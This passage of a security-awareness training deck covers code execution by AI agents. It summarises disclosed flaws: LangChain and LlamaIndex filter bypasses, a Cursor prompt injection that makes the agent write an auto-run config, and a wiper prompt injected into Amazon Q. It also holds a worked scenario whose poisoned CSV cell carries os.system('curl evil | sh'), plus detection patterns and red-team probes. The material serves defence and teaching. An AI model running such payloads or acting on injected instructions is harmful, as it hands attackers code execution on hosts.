        <w:t xml:space="preserve">Disclosed vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LangChain PALChain — a blocklist 'sandbox' bypassed with __import__</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2023-10-09 · CVE-2023-44467 · Primary CVE record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">langchain_experimental before 0.0.306 tried to contain generated code with a blocklist. The list did not include __import__, so the fix for an earlier issue was trivially bypassed and arbitrary Python ran again. CVSS 9.8. Use this one to make the point that denylisting generated code does not work — you need real isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NVD / NIST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2023-44467</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="24" w:name="X947c601551c038289878b90bf890ef2220b448a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosed vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LlamaIndex safe_eval — sanitiser defeated by avoiding underscores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2024-04-16 · CVE-2024-3271 · Ecosystem security advisory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A function named safe_eval attempted to make model-generated code safe by rejecting underscores. Attackers wrote underscore-free payloads that still reached OS command execution. CVSS 9.8, fixed in llama-index-core 0.10.24. A second, independent demonstration that filtering generated code is not containment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GitHub Advisory Database (GHSA-r6gp-rff2-p3hf)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/advisories/GHSA-r6gp-rff2-p3hf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="26" w:name="X9840eb70c152e41525133af0ea219e2602875a8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosed vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CurXecute — injected text writes a config the IDE then executes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2025-08-04 · CVE-2025-54135 · Primary CVE record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cursor auto-executed newly added MCP server entries, and creating a new dotfile did not require approval. An attacker could plant a prompt injection in untrusted data the agent reads (a public Slack channel, for example), get the agent to write ~/.cursor/mcp.json, and have Cursor run arbitrary commands with developer privileges. CVSS 9.8, fixed in 1.3.9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aim Labs; NVD record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2025-54135</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="28" w:name="Xfee113f9defaccaa3120c13c5d0a9d19f7a407e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed incident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Amazon Q Developer extension shipped with an injected wiper prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2025-07 · Confirmed supply-chain incident (trade press)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An outside contributor obtained write access to the aws-toolkit-vscode repository through a permissions misconfiguration and merged a commit adding a system prompt instructing the agent to wipe the system to near-factory state and delete local files and AWS resources. The extension had roughly a million installs. AWS said the payload was malformed and no customer resources were affected; it was patched in v1.85.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reported by BleepingComputer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="Xee0d6bf4127537e7e2aa5386bec4e1f7e180e7b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">09 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Worked scenario — The spreadsheet that opened a shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Constructed to show the mechanism end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A data-analysis agent generates Python and runs it via a code tool. A poisoned CSV cell contains an os.system call.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SETUP — Code-capable agent.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It writes and executes Python to analyse uploaded files.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PAYLOAD — Poisoned cell.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">One CSV cell holds an os.system('curl evil | sh') string.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EXECUTE — Unsandboxed run.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The generated code runs on the worker with network access.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IMPACT — Reverse shell.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The attacker gets a foothold on the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why this matters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Code execution is critical because it collapses every other boundary: with RCE on the worker, an attacker can reach data, tools, memory, and other agents at once.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="common-misconceptions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Common misconceptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expect these as questions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What people say</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What to say back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"It only runs code for internal analysis."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">If untrusted data reaches the code path, intent is irrelevant. Internal analysis with hostile input is still arbitrary execution.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"The model would not write malicious code."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The model does not need to. The payload arrives in the data the code processes.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"Running in a container is a sandbox."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A container with network access, mounted secrets, and a privileged user is packaging, not isolation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="containment-the-three-layers"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Containment — the three layers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assume the code will be hostile and design the runner accordingly: ephemeral, no network egress by default, non-root, read-only filesystem where possible, with hard CPU, memory, and wall-clock limits. Never call eval or exec on untrusted expressions and never deserialise untrusted objects; where dynamic evaluation is genuinely required, use a restricted evaluator with an allowlisted grammar. Build shell commands as argument arrays rather than concatenated strings, which removes metacharacter injection as a class. Then monitor the runner for the behaviour that should never occur — an outbound connection, a spawned shell, a write outside its sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LAYER 01 — Sandbox everything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run generated code in ephemeral, isolated containers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No network egress by default; least-privilege user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hard CPU, memory, and time limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LAYER 02 — No unsafe eval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never eval/exec untrusted expressions or templates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid deserialising untrusted objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prefer safe, parameterised APIs over string commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LAYER 03 — Validate &amp; allowlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allowlist permitted commands and imports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitise every argument; escape shell metacharacters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Treat all tool and file content as untrusted.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="34" w:name="for-developers-secure-code-patterns"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For developers — secure code patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># run whatever the agent produced</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exec(agent_code) # on host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run("convert " + filename) # shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eval(user_formula)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hardened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">with sandbox(net=False, ro=True,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cpu=1, timeout=5) as box:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">box.run(agent_code)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run(["convert", filename]) # no shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">safe_eval(user_formula, allow=MATH)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated code runs in an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ephemeral, network-less, least-privilege sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with resource caps; commands are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">parameterised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and expressions use a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">safe, allowlisted evaluator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="where-the-controls-live"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where the controls live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Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Control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SANDBOX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Isolate execution.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Ephemeral containers, no default egress, least-privilege user, hard resource caps.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NO-EVAL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Ban unsafe eval.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">No exec/eval of untrusted input; no untrusted deserialisation.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PARAMETERISE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Avoid string commands.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Use argument arrays and safe APIs, not shell string concatenation.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ALLOWLIST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Restrict inputs.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Allowlist commands, imports, and expression grammar; sanitise every argument.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="for-every-employee-your-role"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For every employee — your role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non-technical staff are not bystanders here. Three behaviours matter more than any technical understanding of the mechanism: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Spot it.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If an agent does something nobody asked for — moves data, changes records, contacts someone — treat it as suspicious, however confident it sounds.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Don't feed it.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Keep secrets, credentials, and bulk personal records out of agents. Be wary of outside documents an agent will read and act on.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Report it fast.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Agents act at machine speed, so the value of a report decays in minutes. An early, slightly wrong report beats a late, well-researched one.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="detection-what-to-watch-and-log"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Detection — what to watch and log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These signals are only available if the underlying events are logged. Confirm the telemetry exists before relying on the alert.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Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What to watch for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PROCESS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Unexpected spawn.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">The code runner launching shells, curl, or interpreters.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EGRESS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Runner network.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Outbound connections from a box that should have none.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File access.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Reads/writes outside the sandbox's allowed paths.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PATTERN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Dangerous syntax.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">os.system, __import__, backticks, or metacharacters in generated code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="38" w:name="X18c9f069bffb23593336f5839988ae632d93688"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Red-team drill — how to test your own agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run these against a non-production agent with the same configuration as production. A probe only passes if it fails safely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time, not most of the time.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Probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Test and pass criterion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PROBE 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Data-to-code.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Hide a command in an input file. Pass = it never executes.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PROBE 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Shell injection.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Supply a filename with metacharacters. Pass = argument is escaped, no injection.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PROBE 3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Eval abuse.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Feed a malicious expression. Pass = the safe evaluator rejects it.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PROBE 4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Sandbox escape.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Attempt network/file access from the runner. Pass = blocked by isolation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="37" w:name="ship-ready-checklist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ship-ready checklist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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Done when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Sandboxed runner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generated code runs ephemeral, network-less, least-privilege, with resource caps.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unsafe eval.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No exec/eval of untrusted input or untrusted deserialisation.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Parameterised commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Shell calls use argument arrays, never string concatenation.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Input allowlists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Permitted commands, imports, and expression grammar are allowlisted.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Runtime monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Process spawns, egress, and file access from runners are logged and alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="40" w:name="knowledge-check-and-discussion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
